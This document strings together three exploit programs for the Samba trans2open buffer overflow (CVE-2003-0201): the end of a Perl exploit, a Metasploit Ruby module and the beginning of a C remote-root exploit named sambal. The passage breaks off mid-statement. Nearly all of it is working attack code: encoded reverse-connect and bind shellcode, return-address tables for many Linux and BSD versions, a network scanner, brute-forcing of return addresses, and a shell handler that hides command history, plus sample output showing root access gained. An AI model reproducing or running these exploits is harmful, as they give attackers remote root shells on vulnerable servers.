"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01". "\x00\x00\x00\x00"; my $TreeConnect = "\x00\x00\x00\x3c\xff\x53\x4d\x42\x70\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x64\x00". "\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24". "\x25\x6e\x6f\x62\x6f\x64\x79\x00\x00\x00\x00\x00\x00\x00\x49\x50". "\x43\x24"; my $Flush = ("\x00" x 808); print $s $SetupSession; $res = ReadResponse($s); print $s $TreeConnect; $res = ReadResponse($s); # uncomment this for diagnostics #print "[*] Press Enter to Continue...\n"; #$res = <STDIN>; #print "[*] Sending Exploit Buffer...\n"; print $s $Exploit; print $s $Flush; ReadResponse($s); close($s); } sub CreateBuffer_linx86 { my ($Host, $Port, $Return) = @_; my $RetAddr = eval($Return); $RetAddr = pack("l", $RetAddr); my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host)); $a1 = chr(ord($a1) ^ 0x93); $a2 = chr(ord($a2) ^ 0x93); $a3 = chr(ord($a3) ^ 0x93); $a4 = chr(ord($a4) ^ 0x93); my ($p1, $p2) = split(//, reverse(pack("s", $Port))); $p1 = chr(ord($p1) ^ 0x93); $p2 = chr(ord($p2) ^ 0x93); my $exploit = # trigger the trans2open overflow "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00". "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90". GetNops(772) . # xor decoder courtesy of hsj "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01". "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30". "\x93\x40\xe2\xfa". # reverse-connect, mangled lamagra code + fixes "\x1a\x76\xa2\x41\x21\xf5\x1a\x43\xa2\x5a\x1a\x58\xd0\x1a\xce\x6b". "\xd0\x1a\xce\x67\xd8\x1a\xde\x6f\x1e\xde\x67\x5e\x13\xa2\x5a\x1a". "\xd6\x67\xd0\xf5\x1a\xce\x7f\xf5\x54\xd6\x7d". $p1.$p2 ."\x54\xd6\x63". $a1.$a2.$a3.$a4. "\x1e\xd6\x7f\x1a\xd6\x6b\x55\xd6\x6f\x83\x1a\x43\xd0\x1e\xde\x67". "\x5e\x13\xa2\x5a\x03\x18\xce\x67\xa2\x53\xbe\x52\x6c\x6c\x6c\x5e". "\x13\xd2\xa2\x41\x12\x79\x6e\x6c\x6c\x6c\xaa\x42\xe6\x79\x78\x8b". "\xcd\x1a\xe6\x9b\xa2\x53\x1b\xd5\x94\x1a\xd6\x9f\x23\x98\x1a\x60". "\x1e\xde\x9b\x1e\xc6\x9f\x5e\x13\x7b\x70\x6c\x6c\x6c\xbc\xf1\xfa". "\xfd\xbc\xe0\xfb". GetNops(87). ($RetAddr x 8). "DDI!". ("\x00" x 277); return $exploit; } sub CreateBuffer_solx86 { my ($Host, $Port, $Return) = @_; my $RetAddr = eval($Return); my $IckAddr = $RetAddr - 512; $RetAddr = pack("l", $RetAddr); $IckAddr = pack("l", $IckAddr); # IckAddr needs to point to a writable piece of memory my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host)); $a1 = chr(ord($a1) ^ 0x93); $a2 = chr(ord($a2) ^ 0x93); $a3 = chr(ord($a3) ^ 0x93); $a4 = chr(ord($a4) ^ 0x93); my ($p1, $p2) = split(//, reverse(pack("s", $Port))); $p1 = chr(ord($p1) ^ 0x93); $p2 = chr(ord($p2) ^ 0x93); my $exploit = # trigger the trans2open overflow "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00". "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90". GetNops(813) . # xor decoder courtesy of hsj "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01". "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30". "\x93\x40\xe2\xfa". # reverse-connect, code by bighawk "\x2b\x6c\x6b\x6c\xaf\x64\x43\xc3\xa2\x53\x23\x09\xc3\x1a\x76\xa2". "\x5a\xc2\xd2\xd2\xc2\xc2\x23\x75\x6c\x46\xa2\x41\x1a\x54\xfb". $a1.$a2.$a3.$a4 ."\xf5\xfb". $p1.$p2. "\xf5\xc2\x1a\x75\xf9\x83\xc5\xc4\x23\x78\x6c\x46\xa2\x41\x21\x9a". "\xc2\xc1\xc4\x23\xad\x6c\x46\xda\xea\x61\xc3\xfb\xbc\xbc\xe0\xfb". "\xfb\xbc\xf1\xfa\xfd\x1a\x70\xc3\xc0\x1a\x71\xc3\xc1\xc0\x23\xa8". "\x6c\x46". GetNops(87) . "010101". $RetAddr. $IckAddr. $RetAddr. $IckAddr. "101010". "DDI!". ("\x00" x 277); return $exploit; } sub CreateBuffer_bsdx86 { my ($Host, $Port, $Return) = @_; my $RetAddr = eval($Return); my $IckAddr = $RetAddr - 512; $RetAddr = pack("l", $RetAddr); $IckAddr = pack("l", $IckAddr); # IckAddr needs to point to a writable piece of memory my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host)); $a1 = chr(ord($a1) ^ 0x93); $a2 = chr(ord($a2) ^ 0x93); $a3 = chr(ord($a3) ^ 0x93); $a4 = chr(ord($a4) ^ 0x93); my ($p1, $p2) = split(//, reverse(pack("s", $Port))); $p1 = chr(ord($p1) ^ 0x93); $p2 = chr(ord($p2) ^ 0x93); my $exploit = # trigger the trans2open overflow "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00". "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90". GetNops(830) . # xor decoder courtesy of hsj "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01". "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30". "\x93\x40\xe2\xfa". # reverse-connect, code by bighawk "\xa2\x5a\x64\x72\xc2\xd2\xc2\xd2\xc2\xc2\x23\xf2\x5e\x13\x1a\x50". "\xfb". $a1.$a2.$a3.$a4 ."\xf5\xfb". $p1.$p2. "\xf5\xc2\x1a\x75\x21\x83\xc1\xc5\xc3\xc3\x23\xf1\x5e\x13\xd2\x23". "\xc9\xda\xc2\xc0\xc0\x5e\x13\xd2\x71\x66\xc2\xfb\xbc\xbc\xe0\xfb". "\xfb\xbc\xf1\xfa\xfd\x1a\x70\xc2\xc7\xc0\xc0\x23\xa8\x5e\x13". GetNops(87) . "010101". $RetAddr. $IckAddr. $RetAddr. $IckAddr. "101010". "DDI!". ("\x00" x 277); return $exploit; } sub Unblock { my $fd = shift; my $flags; $flags = fcntl($fd,F_GETFL,0) || die "Can't get flags for file handle: $!\n"; fcntl($fd, F_SETFL, $flags|O_NONBLOCK) || die "Can't make handle nonblocking: $!\n"; } sub GoAway { exit(0); } sub ReadResponse { my ($s) = @_; my $sel = IO::Select->new($s); my $res; my @fds = $sel->can_read(4); foreach (@fds) { $res .= <$s>; } return $res; } sub HexDump { my ($data) = @_; my @x = split(//, $data); my $cnt = 0; foreach my $h (@x) { if ($cnt > 16) { print "\n"; $cnt = 0; } printf("\\x%.2x", ord($h)); $cnt++; } print "\n"; } # thank you k2 ;) sub GetNops { my ($cnt) = @_; my @nops = split(//,"\x99\x96\x97\x95\x93\x91\x90\x4d\x48\x47\x4f\x40\x41\x37\x3f\x97". "\x46\x4e\xf8\x92\xfc\x98\x27\x2f\x9f\xf9\x4a\x44\x42\x43\x49\x4b". "\xf5\x45\x4c"); return join ("", @nops[ map { rand @nops } ( 1 .. $cnt )]); } # milw0rm.com [2003-04-07]

## # $Id: trans2open.rb 9828 2010-07-14 17:27:23Z hdm $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB include Msf::Exploit::Brute def initialize(info = {}) super(update_info(info, 'Name' => 'Samba trans2open Overflow (Linux x86)', 'Description' => %q{ This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set. NOTE: Some older versions of RedHat do not seem to be vulnerable since they apparently do not allow anonymous access to IPC. }, 'Author' => [ 'hdm', 'jduck' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9828 $', 'References' => [ [ 'CVE', '2003-0201' ], [ 'OSVDB', '4469' ], [ 'BID', '7294' ], [ 'URL', 'http://seclists.org/bugtraq/2003/Apr/103' ] ], 'Privileged' => true, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", 'MinNops' => 512, 'StackAdjustment' => -3500 }, 'Platform' => 'linux', 'Targets' => [ # tested OK - jjd: # RedHat 7.2 samba-2.2.1a-4 - 0xbffffafc # RedHat 9.0 samba-2.2.7a-7.9.0 - 0xbfffddfc [ 'Samba 2.2.x - Bruteforce', { 'PtrToNonZero' => 0xbffffff4, # near the bottom of the stack 'Offset' => 1055, 'Bruteforce' => { 'Start' => { 'Ret' => 0xbffffdfc }, 'Stop' => { 'Ret' => 0xbfa00000 }, 'Step' => 256 } } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 7 2003' )) register_options( [ Opt::RPORT(139) ], self.class) end def brute_exploit(addrs) curr_ret = addrs['Ret'] begin print_status("Trying return address 0x%.8x..." % curr_ret) connect smb_login if ! @checked_peerlm if smb_peer_lm !~ /samba/i raise RuntimeError, "This target is not a Samba server (#{smb_peer_lm}" end if smb_peer_lm =~ /Samba [34]\./i raise RuntimeError, "This target is not a vulnerable Samba server (#{smb_peer_lm})" end end @checked_peerlm = true # This value *must* be 1988 to allow findrecv shellcode to work # XXX: I'm not sure the above comment is true... pattern = rand_text_english(1988) # See the OSX and Solaris versions of this module for additional # information. # eip_off = 1071 - RH7.2 compiled with -ggdb instead of -O/-O2 # (rpmbuild -bp ; edited/reran config.status ; make) eip_off = target['Offset'] ptr_to_non_zero = target['PtrToNonZero'] # Stuff the shellcode into the request pattern[0, payload.encoded.length] = payload.encoded # We want test true here, so we overwrite conn with a pointer # to something non-zero. # # 222 if (IS_IPC(conn)) { # 223 return(ERROR(ERRSRV,ERRaccess)); # 224 } pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack('V') # We want to avoid crashing on the following two derefences. # # 116 int error_packet(char *inbuf,char *outbuf,int error_class,uint32 error_code,int line) # 117 { # 118 int outsize = set_message(outbuf,0,0,True); # 119 int cmd = CVAL(inbuf,smb_com); pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack('V') pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack('V') # This stream covers the framepointer and the return address #pattern[1199, 400] = [curr_ret].pack('N') * 100 pattern[eip_off, 4] = [curr_ret].pack('V') trans = "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+ "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+ pattern # puts "press any key"; $stdin.gets sock.put(trans) handler rescue ::EOFError rescue ::Rex::Proto::SMB::Exceptions::LoginError, ::Interrupt, ::RuntimeError raise $! rescue ::Exception => e print_error("#{rhost} #{e}") end handler disconnect end end

/* Remote root exploit for Samba 2.2.x and prior that works against Linux (all distributions), FreeBSD (4.x, 5.x), NetBSD (1.x) and OpenBSD (2.x, 3.x and 3.2 non-executable stack). sambal.c is able to identify samba boxes. It will send a netbios name packet to port 137. If the box responds with the mac address 00-00-00-00-00-00, it's probally running samba. [esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0 samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be) -------------------------------------------------------------- + Scan mode. + [192.168.0.3] Samba + [192.168.0.10] Windows + [192.168.0.20] Windows + [192.168.0.21] Samba + [192.168.0.30] Windows + [192.168.0.31] Samba + [192.168.0.33] Windows + [192.168.0.35] Windows + [192.168.0.36] Windows + [192.168.0.37] Windows ... + [192.168.0.133] Samba Great! You could now try a preset (-t0 for a list), but most of the time bruteforce will do. The smbd spawns a new process on every connect, so we can bruteforce the return address... [esdee@embrace esdee]$ ./sambal -b 0 -v 192.168.0.133 samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be) -------------------------------------------------------------- + Verbose mode. + Bruteforce mode. (Linux) + Using ret: [0xbffffed4] + Using ret: [0xbffffda8] + Using ret: [0xbffffc7c] + Using ret: [0xbffffb50] + Using ret: [0xbffffa24] + Using ret: [0xbffff8f8] + Using ret: [0xbffff7cc] + Worked! -------------------------------------------------------------- Linux LittleLinux.selwerd.lan 2.4.18-14 #1 Wed Sep 4 11:57:57 EDT 2002 i586 i586 i386 GNU/Linux uid=0(root) gid=0(root) groups=99(nobody) sambal.c : samba-2.2.8 < remote root exploit by eSDee (www.netric.org| */ #include <stdio.h> #include <string.h> #include <stdlib.h> #include <netdb.h> #include <errno.h> #include <fcntl.h> #include <signal.h> #include <string.h> #include <unistd.h> #include <sys/select.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/time.h> #include <sys/wait.h> #include <netinet/in.h> #include <arpa/inet.h> typedef struct { unsigned char type; unsigned char flags; unsigned short length; } NETBIOS_HEADER; typedef struct { unsigned char protocol[4]; unsigned char command; unsigned short status; unsigned char reserved; unsigned char flags; unsigned short flags2; unsigned char pad[12]; unsigned short tid; unsigned short pid; unsigned short uid; unsigned short mid; } SMB_HEADER; int OWNED = 0; pid_t childs[100]; struct sockaddr_in addr1; struct sockaddr_in addr2; char linux_bindcode[] = "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51" "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50" "\x50\x66\x68\xb0\xef\xb3\x02\x66\x53\x89\xe2\xb3\x10\x53\xb3\x02" "\x52\x51\x89\xca\x89\xe1\xb0\x66\xcd\x80\x31\xdb\x39\xc3\x74\x05" "\x31\xc0\x40\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb3\x04\xb0\x66\xcd" "\x80\x89\xd7\x31\xc0\x31\xdb\x31\xc9\xb3\x11\xb1\x01\xb0\x30\xcd" "\x80\x31\xc0\x31\xdb\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80" "\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80\x39\xc3\x75\x40\x31\xc0" "\x89\xfb\xb0\x06\xcd\x80\x31\xc0\x31\xc9\x89\xf3\xb0\x3f\xcd\x80" "\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0" "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8b\x54\x24" "\x08\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x31\xc0" "\x89\xf3\xb0\x06\xcd\x80\xeb\x99"; char bsd_bindcode[] = "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0" "\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02" "\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80" "\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57" "\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89" "\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50" "\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80" "\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56" "\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd" "\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f" "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b" "\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80" "\xeb\x9a"; char linux_connect_back[] = "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51" "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51" "\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3" "\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1" "\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" "\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f" "\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" "\x01\xcd\x80"; char bsd_connect_back[] = "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0" "\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef" "\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0" "\xb0\x62\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80" "\x31\xc0\x50\x52\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x52" "\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x52\x50\xb0\x5a\xcd\x80\x31" "\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54" "\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"; struct { char *type; unsigned long ret; char *shellcode; int os_type; /* 0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD non-exec stack */ } targets[] = { { "samba-2.2.x - Debian 3.0 ", 0xbffffea2, linux_bindcode, 0 }, { "samba-2.2.x - Gentoo 1.4.x ", 0xbfffe890, linux_bindcode, 0 }, { "samba-2.2.x - Mandrake 8.x ", 0xbffff6a0, linux_bindcode, 0 }, { "samba-2.2.x - Mandrake 9.0 ", 0xbfffe638, linux_bindcode, 0 }, { "samba-2.2.x - Redhat 9.0 ", 0xbffff7cc, linux_bindcode, 0 }, { "samba-2.2.x - Redhat 8.0 ", 0xbffff2f0, linux_bindcode, 0 }, { "samba-2.2.x - Redhat 7.x ", 0xbffff310, linux_bindcode, 0 }, { "samba-2.2.x - Redhat 6.x ", 0xbffff2f0, linux_bindcode, 0 }, { "samba-2.2.x - Slackware 9.0 ", 0xbffff574, linux_bindcode, 0 }, { "samba-2.2.x - Slackware 8.x ", 0xbffff574, linux_bindcode, 0 }, { "samba-2.2.x - SuSE 7.x ", 0xbffffbe6, linux_bindcode, 0 }, { "samba-2.2.x - SuSE 8.x ", 0xbffff8f8, linux_bindcode, 0 }, { "samba-2.2.x - FreeBSD 5.0 ", 0xbfbff374, bsd_bindcode, 1 }, { "samba-2.2.x - FreeBSD 4.x ", 0xbfbff374, bsd_bindcode, 1 }, { "samba-2.2.x - NetBSD 1.6 ", 0xbfbfd5d0, bsd_bindcode, 1 }, { "samba-2.2.x - NetBSD 1.5 ", 0xbfbfd520, bsd_bindcode, 1 }, { "samba-2.2.x - OpenBSD 3.2 ", 0x00159198, bsd_bindcode, 2 }, { "samba-2.2.8 - OpenBSD 3.2 (package)", 0x001dd258, bsd_bindcode, 2 }, { "samba-2.2.7 - OpenBSD 3.2 (package)", 0x001d9230, bsd_bindcode, 2 }, { "samba-2.2.5 - OpenBSD 3.2 (package)", 0x001d6170, bsd_bindcode, 2 }, { "Crash (All platforms) ", 0xbade5dee, linux_bindcode, 0 }, }; void shell(); void usage(); void handler(); int is_samba(char *ip, unsigned long time_out); int Connect(int fd, char *ip, unsigned int port, unsigned int time_out); int read_timer(int fd, unsigned int time_out); int write_timer(int fd, unsigned int time_out); int start_session(int sock); int exploit_normal(int sock, unsigned long ret, char *shellcode); int exploit_openbsd32(int sock, unsigned long ret, char *shellcode); void usage(char *prog) { fprintf(stderr, "Usage: %s [-bBcCdfprsStv] [host]\n\n" "-b <platform> bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)\n" "-B <step> bruteforce steps (default = 300)\n" "-c <ip address> connectback ip address\n" "-C <max childs> max childs for scan/bruteforce mode (default = 40)\n" "-d <delay> bruteforce/scanmode delay in micro seconds (default = 100000)\n" "-f force\n" "-p <port> port to attack (default = 139)\n" "-r <ret> return address\n" "-s scan mode (random)\n" "-S <network> scan mode\n" "-t <type> presets (0 for a list)\n" "-v verbose mode\n\n", prog); exit(1); } int is_samba(char *ip, unsigned long time_out) { char nbtname[]= /* netbios name packet */ { 0x80,0xf0,0x00,0x10,0x00,0x01,0x00,0x00, 0x00,0x00,0x00,0x00,0x20,0x43,0x4b,0x41, 0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21, 0x00,0x01 }; unsigned char recv_buf[1024]; unsigned char *ptr; int i = 0; int s = 0; unsigned int total = 0; if ((s = socket(PF_INET, SOCK_DGRAM, 17)) <= 0) return -1; if(Connect(s, ip, 137, time_out) == -1) { close(s); return -1; } memset(recv_buf, 0x00, sizeof(recv_buf)); if(write_timer(s, time_out) == 1) { if (write(s, nbtname, sizeof(nbtname)) <= 0) { close(s); return -1; } } if (read_timer(s, time_out) == 1) { if (read(s, recv_buf, sizeof(recv_buf)) <= 0) { close(s); return -1; } ptr = recv_buf + 57; total = *(ptr - 1); /* max names */ while(ptr < recv_buf + sizeof(recv_buf)) { ptr += 18; if (i == total) { ptr -= 19; if ( *(ptr + 1) == 0x00 && *(ptr + 2) == 0x00 && *(ptr + 3) == 0x00 && *(ptr + 4) == 0x00 && *(ptr + 5) == 0x00 && *(ptr + 6) == 0x00) { close(s); return 0; } close(s); return 1; } i++; } } close(s); return -1; } int Connect(int fd, char *ip, unsigned int port, unsigned int time_out) { /* ripped from no1 */ int flags; int select_status; fd_set connect_read, connect_write; struct timeval timeout; int getsockopt_length = 0; int getsockopt_error = 0; struct sockaddr_in server; bzero(&server, sizeof(server)); server.sin_family = AF_INET; inet_pton(AF_INET, ip, &server.sin_addr); server.sin_port = htons(port); if((flags = fcntl(fd, F_GETFL, 0)) < 0) { close(fd); return -1; } if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) { close(fd); return -1; } timeout.tv_sec = time_out; timeout.tv_usec = 0; FD_ZERO(&connect_read); FD_ZERO(&connect_write); FD_SET(fd, &connect_read); FD_SET(fd, &connect_write); if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0) { if(errno != EINPROGRESS) { close(fd); return -1; } } else { if(fcntl(fd, F_SETFL, flags) < 0) { close(fd); return -1; } return 1; } select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout); if(select_status == 0) { close(fd); return -1; } if(select_status == -1) { close(fd); return -1; } if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write)) { if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write)) { getsockopt_length = sizeof(getsockopt_error); if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0) { errno = ETIMEDOUT; close(fd); return -1; } if(getsockopt_error == 0) { if(fcntl(fd, F_SETFL, flags) < 0) { close(fd); return -1; } return 1; } else { errno = getsockopt_error; close(fd); return (-1); } } } else { close(fd); return 1; } if(fcntl(fd, F_SETFL, flags) < 0) { close(fd); return -1; } return 1; } int read_timer(int fd, unsigned int time_out) { /* ripped from no1 */ int flags; int select_status; fd_set fdread; struct timeval timeout; if((flags = fcntl(fd, F_GETFL, 0)) < 0) { close(fd); return (-1); } if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) { close(fd); return (-1); } timeout.tv_sec = time_out; timeout.tv_usec = 0; FD_ZERO(&fdread); FD_SET(fd, &fdread); select_status = select(fd + 1, &fdread, NULL, NULL, &timeout); if(select_status == 0) { close(fd); return (-1); } if(select_status == -1) { close(fd); return (-1); } if(FD_ISSET(fd, &fdread)) { if(fcntl(fd, F_SETFL, flags) < 0) { close(fd); return -1; } return 1; } else { close(fd); return 1; } } int write_timer(int fd, unsigned int time_out) { /* ripped from no1 */ int flags; int select_status; fd_set fdwrite; struct timeval timeout; if((flags = fcntl(fd, F_GETFL, 0)) < 0) { close(fd); return (-1); } if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) { close(fd); return (-1); } timeout.tv_sec = time_out; timeout.tv_usec = 0; FD_ZERO(&fdwrite); FD_SET(fd, &fdwrite); select_status = select(fd + 1, NULL, &fdwrite, NULL, &timeout); if(select_status == 0) { close(fd); return -1; } if(select_status == -1) { close(fd); return -1; } if(FD_ISSET(fd, &fdwrite)) { if(fcntl(fd, F_SETFL, flags) < 0) { close(fd); return -1; } return 1; } else { close(fd); return -1; } } void shell(int sock) { fd_set fd_read; char buff[1024], *cmd="unset HISTFILE; echo \"*** JE MOET JE MUIL HOUWE\";uname -a;id;\n"; int n; FD_ZERO(&fd_read); FD_SET(sock, &fd_read); FD_SET(0, &fd_read); send(sock, cmd, strlen(cmd), 0); while(1) { FD_SET(sock,&fd_read); FD_SET(0,&fd_read); if (select(FD_SETSIZE, &fd_read, NULL, NULL, NULL) < 0 ) break; if (FD_ISSET(sock, &fd_read)) { if((n = recv(sock, buff, sizeof(buff), 0)) < 0){ fprintf(stderr, "EOF\n"); exit(2); } if (write(1, buff, n) < 0) break; } if (FD_ISSET(0, &fd_read)) { if((n = read(0, buff, sizeof(buff))) < 0){ fprintf(stderr, "EOF\n"); exit(2); } if (send(sock, buff, n, 0) < 0) break; } usleep(10); } fprintf(stderr, "Connection lost.\n\n"); exit(0); } void handler() { int sock = 0; int i = 0; OWNED = 1; for (i = 0; i < 100; i++) if (childs[i] != 0xffffffff) waitpid(childs[i], NULL, 0); if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) { close(sock); exit(1); } if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) { fprintf(stdout, "+ Worked!\n" "--------------------------------------------------------------\n"); shell(sock); close(sock); } } int start_session(int sock) { char buffer[1000]; char response[4096]; char session_data1[] = "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00"; char session_data2[] = "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64\x79" "\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24"; NETBIOS_HEADER *netbiosheader; SMB_HEADER *smbheader; memset(buffer, 0x00, sizeof(buffer)); netbiosheader = (NETBIOS_HEADER *)buffer; smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); netbiosheader->type = 